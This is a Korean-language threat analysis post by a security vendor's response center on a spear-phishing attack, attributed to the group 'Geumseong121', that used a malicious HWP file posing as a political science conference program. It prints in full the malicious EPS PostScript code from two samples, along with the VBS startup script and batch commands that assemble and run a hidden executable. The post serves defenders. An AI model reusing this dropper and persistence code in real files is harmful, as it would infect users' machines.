금성121 조직, 학술회의 안내로 위장한 '프린팅 페이퍼' APT 공격 시도

■ 학술회의 프로그램을 위장한 APT 공격 등장

안녕하세요? 이스트시큐리티 시큐리티대응센터(이하 ESRC)입니다.

2019년 04월 10일 제작된 새로운 HWP 악성 문서파일이 발견되었고, 정부 후원을 받고 있는 '금성121(Geumseong121)'이 위협 배후에 있는 것으로 확인되었습니다.

ESRC에서는 이번 APT(지능형지속위협) 공격이 지난 4월 경 은밀하게 수행됐을 것으로 의심하고 있으며, 식별된 악성 파일의 이름은 '[한국정치학회] 춘계학술회의 프로그램.hwp' 입니다.

[그림 1] HWP 악성 문서 파일의 내부 스트림 화면

■ 금성121, 매우 활발한 사이버 스파이 위협 조직

'BIN0001.eps' 파일 내부에는 다음과 같은 포스트 스크립트(Post Script) 코드가 포함되어 있으며, 명령어에 의해 시작 프로그램 경로에 'SamsungPrinter47.vbs' 파일을 생성하게 됩니다.

ESRC에서는 한국의 특정 프린터 파일처럼 위장한 문서 파일의 특징을 활용해 이번 사이버 작전명을 '오퍼레이션 프린팅 페이퍼(Operation Printing Paper)'로 명명했습니다.

마치 삼성의 프린터 파일처럼 위장한 악성 'SamsungPrinter47.vbs' 파일의 내부에는 다음과 같은 명령어를 담고 있습니다.

Set UserShellP = CreateObject("WScript.shell")

UserShellP.Run chr(34) & "%appdata%\Cache62.bat" & chr(34), 0

Set UserShellP = Nothing

%appdata% 경로에 생성된 'Cache62.bat' 파일은 %appdata% 경로에 드롭된 'Pemrr01.wta01', 'Pemrr02.wta01' 파일을 아래의 명령을 통해 통합하게 됩니다.

copy /b "%appdata%\*.wta01" "%appdata%\SamsungVer3.01.03Printer.com" & "%appdata%\SamsungVer3.01.03Printer.com" -normal& del /f "%appdata%\SamsungVer3.01.03Printer.com" 

'Pemrr01.wta01' 파일에는 'MZ' 코드만 포함되어 있고, 'Pemrr02.wta01' 파일에는 나머지 EXE 파일의 코드를 가지고 있습니다. 이 코드는 'closefile{ }' 영역에 포함되어 있습니다.  

명령에 의해 최종적으로 조립된 악성파일도 마치 삼성 프린터 모듈처럼 이름을 'SamsungVer3.01.03Printer.com' 으로 위장하여 설치됩니다.

[그림 2] 포스트 스크립트 명령어 화면

'SamsungVer3.01.03Printer.com' 파일은 한국시간(KST) 기준으로 2019년 04월 10일 12시 05분에 제작되었습니다.

HWP 문서가 실행되면 다음과 같은 화면을 보여주어, 이용자로 하여금 정상 파일처럼 위장하게 됩니다.

[그림 3] 악성 HWP 문서가 실행된 후 보여지는 화면

ESRC는 공격자가 실제 한국에서 진행되는 학술회의 내용을 무단으로 도용해 스피어 피싱(Spear Phishing) 공격에 사용한 것으로 보고 있습니다.

사단법인 한국정치학회 홈페이지에는 관련 안내 공지가 등록되어 있습니다.

- http://www.kpsa.or.kr/modules/bbs/index.php?code=notice&mode=view&id=500

- http://www.kpsa.or.kr/modules/bbs/index.php?code=notice&mode=view&id=503

■ 금성121, '델파이 설문지-고려대' 스피어 피싱 공격 사례와 비교

2018년 11월 07일 경, '델파이 설문지-고려대' 제목으로 한국의 특정 분야에 있는 사람들에게 스피어 피싱 공격이 수행된 바 있고, 북한이탈주민 300명을 대상으로 조사가 진행된다는 내용을 담고 있습니다.

이 공격에 사용된 악성 HWP 문서파일명은 '델파이 설문지.hwp' 입니다.

[그림 4] 설문지 내용으로 위장되어 수행된 해킹 이메일 화면

%!PS-Adobe-3.0 EPSF-3.0 /popmenuw{ exch dup 3 pop length 3 pop 2 index 5 pop length add string  dup dup 4 2 pop 3 pop 2 roll 2 pop 3 pop copy 2 pop 3 pop length 2 pop 3 pop 4 -1 roll putinterval}bind def(appdata)getenv pop /envstr exch def envstr(\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\MemCacheLog26.vbs)popmenuw/path4 exch def envstr(\\Pemzz01.hkp01)popmenuw/path2 exch def envstr(\\Pemzz02.hkp01) popmenuw/path3 exch def envstr(\\Cache49.bat) popmenuw/path1 exch def path4 (w) file /file0 exch def file0(Set WshShell = CreateObject\("WScript.shell"\)\r\nWshShell.Run chr\(34\) & "%appdata%\\Cache49.bat" & chr\(34\), 0\r\nSet WsheShell = Nothing)writestring file0 closefile path1 (w) file /file1 exch def file1(copy /b "%appdata%\\*.hkp01" "%appdata%\\MemoryOrder687650781.com" & "%appdata%\\MemoryOrder687650781.com" & del /f "%appdata%\\MemoryOrder687650781.com" )writestring file1 closefile path2(w)file /file2 exch def file2(MZ)writestring file2 closefile/databuf 8 string def/firp 1 def path3(w)file /file3 exch def{currentfile databuf readhexstring{firp 1 eq{/firp 2 def}{file3 exch writestring}ifelse}{dup length 0 gt{file3 exch writestring}{pop}ifelse exit}ifelse}loop file3 closefile{

%!PS-Adobe-3.0 EPSF-3.0 /popmenuw{ exch dup 7 pop length 7 pop 2 index 4 pop length add string  dup dup 4 8 pop 5 pop 2 roll 3 pop 7 pop copy 2 pop 3 pop length 2 pop 3 pop 4 -1 roll putinterval}bind def (ap) (pdata) popmenuw /appenv exch def appenv getenv pop /envstr exch def envstr(\\Microsoft\\Windows\\Start M)popmenuw/patho exch def patho(enu\\Programs\\StartUp\\SamsungPrinter47.vbs)popmenuw/path4 exch def envstr(\\Pemrr01.wta01)popmenuw/path2 exch def envstr(\\Pemrr02.wta01) popmenuw/path3 exch def envstr(\\Cache62.bat) popmenuw/path1 exch def path2(w)file /file2 exch def file2(MZ)writestring file2 closefile path4 (w) file /file0 exch def file0 (Set UserShellP = CreateObject\("WScript.shell"\)\r\nUserShellP.Run chr\(34\) & "%app)writestring file0 (data%\\Cache62.bat" & chr\(34\), 0\r\nSet UserShellP = Nothing)writestring file0 closefile path1(w)file/file1 exch def file1 (copy /b "%app)writestring file1 (data%\\*.wta01" "%app)writestring file1 (data%\\SamsungVer3.01.03Printer.com" & "%app)writestring file1 (data%\\SamsungVer3.01.03Printer.com" -normal)writestring file1 (& del /f "%app)writestring file1 (data%\\SamsungVer3.01.03Printer.com" )writestring file1 closefile /mediabuff 8 string def/firp 1 def path3(w)file /file3 exch def{currentfile mediabuff readhexstring {firp 1 eq{/firp 2 def}{file3 exch writestring}ifelse}{dup length 0 gt{file3 exch writestring}{pop}ifelse exit}ifelse}loop file3 closefile{

델파이 설문지.hwp

[한국정치학회] 춘계학술회의 프로그램.hwp

2018년 11월 발견된 '델파이 설문지.hwp' 악성 문서파일의 eps 코드와 2019년 04월 제작된 '[한국정치학회] 춘계학술회의 프로그램.hwp' 악성 문서파일의 eps 코드가 동일한 패턴을 가지고 있음을 알 수 있습니다.

그리고 문서파일의 작성자 계정도 'user', 'User1' 등으로 일치함을 확인할 수 있습니다.

[그림 5] HWP 문서 파일 메타 데이터 비교 화면

ESRC는 이러한 공격 기법을 여러차례 목격한 바 있으며, 2018년 11월 16일 "금성121(Geumseong121) 정부기반 APT그룹, '코리안 스워드(Operation Korean Sword) 작전 수행 중'" 리포트를 통해 공개한 바 있습니다.

'코리안 스워드' 당시 사용된 'redbigstone' 아이디는 '델파이 설문지.hwp' 공격에서도 동일하게 사용됩니다.

금성121 조직이 사용하는 오퍼레이션은 크게 '로켓맨'과 '코리안 스워드' 유형으로 구분이 가능합니다.

File Name	[한국정치학회] 춘계학술회의 프로그램.hwp
MD5	de4b2a970bfab5209c9aa5c1a541ff76

File Name	SamsungVer3.01.03Printer.com
MD5	3dbf18a8ae5cd1e9168e572189abac86

추가 상세 분석 내용은 추후 '쓰렛 인사이드(Threat Inside)' 위협 인텔리전스 리포트를 통해 제공할 예정입니다.

▶ 금성121, <로켓맨 캠페인> 오퍼레이션 '블랙 배너' APT 공격 등장 (2019.04.29)

▶ '금성121 조직', 통일부를 사칭한 APT 공격, 구글 드라이브로 악성코드 전파 (2019.04.22)

▶ 금성121 APT 조직, '오퍼레이션 하이 엑스퍼트(Operation High Expert)' (2019.04.02)

▶ 로켓맨 APT 캠페인, '오퍼레이션 골든 버드(Operation Golden Bird)' (2019.03.20)

▶ 홀리데이 와이퍼(Operation Holiday Wiper)로 귀환한 로켓맨 APT 캠페인 (2019.01.23)

▶ '오퍼레이션 블랙버드(Operation Blackbird)', 금성121의 모바일 침공 (2018.12.13)

▶ 금성121(Geumseong121) 정부기반 APT그룹, '코리안 스워드(Operation Korean Sword) 작전' 수행 중 (2018.11.16)

▶ 금성121 그룹의 최신 APT 캠페인 - '작전명 로켓 맨(Operation Rocket Man)' (2018.08.22)

▶ 금성121, Flash Player Zero-Day (CVE-2018-4878) 공격 주의 (2018.02.02)